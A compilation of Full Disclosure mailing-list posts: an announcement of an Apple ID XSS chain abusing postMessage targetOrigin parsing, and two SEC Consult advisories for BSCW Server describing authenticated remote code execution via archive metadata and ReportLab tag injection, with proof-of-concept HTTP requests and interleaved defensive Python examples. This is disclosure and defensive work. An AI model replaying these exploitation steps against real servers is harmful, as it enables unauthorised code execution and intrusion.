[FD] XSS in Apple ID Server idmsa.apple.com
Hi seclists! I wanted to try posting some of my research here, and I think this is the right list. I recently published some research into Apple ID security that culminated in an XSS on the Apple ID server -- that is, an attacker can pop out an Apple login page that autofills your credentials and 2FA :)

In particular, it has several really interesting components in the chain:

- a Content Security Policy injection / bypass to slacken JavaScript code execution and embed restrictions
- bypass to postMessage restrictions on sending and receiving messages that uses some deep diving into the relevant spec
- several bugs that involve interpretation malleability of URLs

I was surprised to find out that postMessage's 'targetOrigin' parameter does not, as the spec describes, take a target origin, but actually a target *URL* which is then *parsed* to extract an origin. This means that, say, 'https://nonsense:morenonse...@apple.com/somepath?nonsense#nonsense' as a *targetOrigin* will match 'https://apple.com'.

The full write-up can be found here: https://zemnmez.medium.com/how-to-hack-apple-id-f3cc9b483a41

Thomas

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
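The targetOrigin behaviour described above, as an added example that is not part of the post or of any Apple code: Python's urllib.parse stands in for the browser's URL parser to show how a URL-shaped string is reduced to an origin before comparison, plus the exact-match check a receiving page should apply to event.origin. All sample strings and example.com are constructed.

```python
from typing import Iterable, Optional
from urllib.parse import urlsplit

DEFAULT_PORTS = {"https": 443, "http": 80}


def origin_of(target: str) -> Optional[str]:
    """Reduce a URL-shaped targetOrigin to scheme://host[:port].

    Userinfo, path, query and fragment are parsed and then dropped, which is
    the behaviour the post describes. Returns None for anything unparsable.
    """
    parts = urlsplit(target)
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    try:
        port = parts.port  # ValueError for a non-numeric port
    except ValueError:
        return None
    if port is None or port == DEFAULT_PORTS[parts.scheme]:
        return f"{parts.scheme}://{parts.hostname}"
    return f"{parts.scheme}://{parts.hostname}:{port}"


def same_origin(target: str, expected: str) -> bool:
    """Compare two origins only after both have been normalised the same way."""
    left, right = origin_of(target), origin_of(expected)
    return left is not None and left == right


def is_trusted_sender(event_origin: str, allowlist: Iterable[str]) -> bool:
    """Receiver-side check on event.origin: exact match against an allow-list.

    A prefix or substring test would accept look-alike origins such as
    https://example.com.evil.test for an entry https://example.com.
    """
    return any(event_origin == allowed for allowed in allowlist)


if __name__ == "__main__":
    # Constructed strings; example.com stands in for the host in the post.
    decorated = "https://user:secret@example.com/some/path?query#fragment"
    print(origin_of(decorated))                                 # https://example.com
    print(same_origin(decorated, "https://example.com"))        # True
    print(is_trusted_sender("https://example.com.evil.test",
                            ["https://example.com"]))           # False
```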
[FD] SEC Consult SA-20210827-0 :: Authenticated RCE in BSCW Server
SEC Consult Vulnerability Lab Security Advisory < 20210827-0 >
===
title: Authenticated RCE
product: BSCW Server
vulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2
fixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3
CVE number: CVE-2021-39271
impact: high
homepage: https://www.bscw.de/classic/
found: 2021-06-30
by: Armin Stock (Atos Germany)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"A versatile system for any field of application
BSCW Classic is in use around the world. With more than 500 functions, it offers the right solution for every task. Turn your ideas into reality! Our proven system has been supporting information flow and knowledge management at numerous companies for more than 20 years."

Source: https://www.bscw.de/en/classic/

Business recommendation:
The vendor provides a patched version for the affected products, which should be installed immediately.

Vulnerability overview/description:
---
1) Authenticated RCE
The application allows a user with low privileges to upload different kinds of archives (`ZIP`, `tar`, `RFC822`) and extract them on the server. During the extraction process a special file (`.bscw`) is processed to attach metadata to the files created during extraction. This metadata file contains an attribute (`class`), which is later used to instantiate a class/call a function to create the desired object. As there is no allow-list implemented to limit the class/function which can be called, it is possible to call an arbitrary `Python` function. During the function call there are two parameters provided, where the first is controlled by the attacker (an element from the metadata file: `bscw:name`).

Proof of concept:
---
1) Authenticated RCE
The first step is to create an archive with a malicious `.bscw` file.
$ zip ../data.zip ./.bscw ./*
---
http://bscw.de/bscw/bscwarc.dtd;>
http://bscw.local; timestamp="20210630T123242Z" pathsep="\\">
http://bscw.de/bscw/elements/0.1/doc/; xmlns:bscw="http://bscw.de/bscw/elements/0.1/; >
HTML Document
CONTENT OF FIRST PARAMETER
---
Then the archive can be uploaded to a folder (OID: 267) to which the user has write access:
---
PUT /sec/bscw.cgi/267/data.zip HTTP/1.1
Host: bscw.local:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/zip
Content-Length: 1559
DNT: 1
Connection: close
Cookie: bscw_auth=""

PK.
---
After uploading the archive, the `extract` operation can be called for the newly created file object (OID: 1179):
---
GET /sec/bscw.cgi/267?op=extract=267_1179 HTTP/1.1
Host: bscw.local:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://bscw.local:8080/sec/bscw.cgi/267
Cookie: bscw_auth=""
Upgrade-Insecure-Requests: 1
---
During the extraction the function from the `class` attribute is located and called.
---
# File: bs_extract.py
def createArtifact(self, request, tree, user, target=None):
    """create artifact for user and add to target
    returns tuple (artifact, oldid) - or (None, None)
    """
    #
    # Locating the class/function
    #
    klass = metadata 'class' attribute
    klass_tuple = klass.split('.')
    klass_name = klass_tuple[(-1)]
    klass_modul = ('.').join(klass_tuple[:-1])
    try:
        modul = __import__('bscw').module(klass_modul)
    except ImportError as ie:
        log_arc.warning('ImportError: %s ', str(ie))
        klass = 'bscw.core.cl_folder.Folder'
        modul = None
    if modul and hasattr(modul, klass_name):
        cons
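The resolution pattern the advisory describes, as an added example that is not BSCW's code: a metadata-supplied dotted name resolved by import and attribute lookup (any importable function becomes callable, with the first argument under the uploader's control), next to a hardened resolver that only accepts exact entries from a fixed allow-list. The module path `example.core`, the stand-in classes and the allow-list are hypothetical.

```python
import importlib
from typing import Any, Callable, Dict


class Folder:
    """Stand-in for a legitimate artifact class (hypothetical)."""

    def __init__(self, name: str, target: Any = None) -> None:
        self.name, self.target = name, target


class Document(Folder):
    """Second stand-in, so the allow-list has more than one entry."""


# Hypothetical allow-list keyed by the exact dotted name stored in metadata.
# Only these callables may ever be reached from the `class` attribute.
ALLOWED_ARTIFACT_CLASSES: Dict[str, Callable[..., Any]] = {
    "example.core.Folder": Folder,
    "example.core.Document": Document,
}


def resolve_unsafe(klass: str) -> Callable[..., Any]:
    """Mirrors the advisory's pattern: split on '.', import, getattr, no limits."""
    module_name, _, attr = klass.rpartition(".")
    module = importlib.import_module(module_name)
    return getattr(module, attr)


def resolve_safe(klass: str) -> Callable[..., Any]:
    """Hardened: the metadata value is a dictionary key, never an import path."""
    try:
        return ALLOWED_ARTIFACT_CLASSES[klass]
    except KeyError:
        raise ValueError(f"artifact class not permitted: {klass!r}") from None


def create_artifact(klass: str, name: str, target: Any = None, *, safe: bool = True) -> Any:
    """Call the resolved class/function with the uploader-controlled name first."""
    resolver = resolve_safe if safe else resolve_unsafe
    return resolver(klass)(name, target)


if __name__ == "__main__":
    # Legitimate use: a permitted class is instantiated.
    print(type(create_artifact("example.core.Folder", "docs")).__name__)   # Folder
    # Unsafe resolver: a harmless stdlib function is reached and called with
    # the metadata-controlled value as its first argument.
    print(create_artifact("posixpath.join", "a", "b", safe=False))         # a/b
    # Safe resolver rejects the same name outright.
    try:
        create_artifact("posixpath.join", "a", "b")
    except ValueError as err:
        print(err)
```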
[FD] SEC Consult SA-20210827-1 :: XML Tag injection in BSCW Server
SEC Consult Vulnerability Lab Security Advisory < 20210827-1 >
===
title: XML Tag injection
product: BSCW Server
vulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2
fixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3
CVE number: CVE-2021-36359
impact: high
homepage: https://www.bscw.de/classic/
found: 2021-06-30
by: Armin Stock (Atos Germany)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"A versatile system for any field of application
BSCW Classic is in use around the world. With more than 500 functions, it offers the right solution for every task. Turn your ideas into reality! Our proven system has been supporting information flow and knowledge management at numerous companies for more than 20 years."

Source: https://www.bscw.de/en/classic/

Business recommendation:
The vendor provides a patched version for the affected products, which should be installed immediately.

Vulnerability overview/description:
---
1) XML Tag injection
The application allows a user with low privileges to export different objects to a `PDF` file (`Send To -> File(PDF)`) via the `exportpdf` package. To export the content of the objects the framework ReportLab is used. This library supports different tags to export structured content:
---
# File: reportlab/platypus/paraparser.py
!!! NOTE !!! THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!!
The ParaFormatter will be able to format the following tags:
  < /b > - bold
  < /i > - italics
  < u [color="red"] [width="pts"] [offset="pts"]> < /u > - underline
    width and offset can be empty meaning use existing canvas line width
    or with an f/F suffix regarded as a fraction of the font size
  < strike > < /strike > - strike through has the same parameters as underline
  < super [size="pts"] [rise="pts"]> < /super > - superscript
  < sup ="pts"] [rise="pts"]> < /sup > - superscript
  < sub ="pts"] [rise="pts"]> < /sub > - subscript
  < bullet > - bullet text (at head of para only)
  link text
    attributes of links
      size/fontSize/uwidth/uoffset=num
      name/face/fontName=name
      fg/textColor/color/ucolor=color
      backcolor/backColor/bgcolor=color
      dest/destination/target/href/link=target
      underline=bool turn on underline
  anchor text
    attributes of anchors
      fontSize=num
      fontName=name
      fg/textColor/color=color
      backcolor/backColor/bgcolor=color
      href=href
  width="w%" --> fontSize*w/100 idea from Roberto Alsina
  height="h%" --> linewidth*h/100
  - ... turn off word breaking and hyphenation
The whole may be surrounded by tags
---
The application does not properly encode the user content before passing it to `ReportLab`, which allows the user to inject their own tags. These tags get evaluated by `ReportLab`. Depending on the version of `ReportLab`, it allows the user to do an `SSRF` (server side request forgery) attack via the `img` tag (https://snyk.io/vuln/SNYK-PYTHON-REPORTLAB-1022145).

There are also known vulnerabilities in `ReportLab`:
* https://www.cybersecurity-help.cz/vdb/SB2019101613
* https://hg.reportlab.com/hg-public/reportlab/rev/b117091a73c2

This allows an attacker to execute `Python` code via the `unichar` tag or the `color` attribute.

Proof of concept:
---
1) XML Tag injection
One possible injection point is the `description` of a folder. Using the following payload allows the execution of the `Python` code `28+20`.
hello

The result of this code is `48` (ASCII: `0`), which gets written to the generated `PDF` file.
---
POST /sec/bscw.cgi/1917?op=_editfolder.EditFolder HTTP/1.1
Host: bscw.local:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,
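The encoding gap the advisory describes, as an added example that is neither BSCW's nor ReportLab's code: a folder description spliced straight into paragraph markup next to the hardened form that escapes it first, with xml.etree standing in for ReportLab's markup parser to show whether the user text still parses as a tag. The `<para>` template, the sample description and the tag attribute in it are constructed.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed sample: a folder description carrying a ReportLab-style tag.
SAMPLE_DESCRIPTION = '<unichar name="CONSTRUCTED"/>hello'

# Anything that looks like an opening/closing tag or an entity reference.
MARKUP_RE = re.compile(r"<\s*/?\s*[A-Za-z]|&#?\w+;")


def to_paragraph_markup_unsafe(description: str) -> str:
    """The pattern the advisory describes: user text embedded without encoding."""
    return f"<para>{description}</para>"


def to_paragraph_markup(description: str) -> str:
    """Hardened: escape &, <, > and both quote styles, so the text can neither
    open a tag nor break out of an attribute value in the template."""
    safe = escape(description, {'"': "&quot;", "'": "&#39;"})
    return f"<para>{safe}</para>"


def contains_markup(description: str) -> bool:
    """Detection helper: flag descriptions that carry tag-like or entity text,
    e.g. for logging at the point where an export is requested."""
    return MARKUP_RE.search(description) is not None


def element_count(markup: str) -> int:
    """Elements nested inside <para>; 0 means the user text stayed plain text."""
    root = ET.fromstring(markup)
    return sum(1 for _ in root.iter()) - 1


def rendered_text(markup: str) -> str:
    """Text the paragraph carries once entities are decoded by the parser."""
    return ET.fromstring(markup).text or ""


if __name__ == "__main__":
    print(element_count(to_paragraph_markup_unsafe(SAMPLE_DESCRIPTION)))  # 1
    print(element_count(to_paragraph_markup(SAMPLE_DESCRIPTION)))         # 0
    print(rendered_text(to_paragraph_markup(SAMPLE_DESCRIPTION)))
    print(contains_markup(SAMPLE_DESCRIPTION))                            # True
```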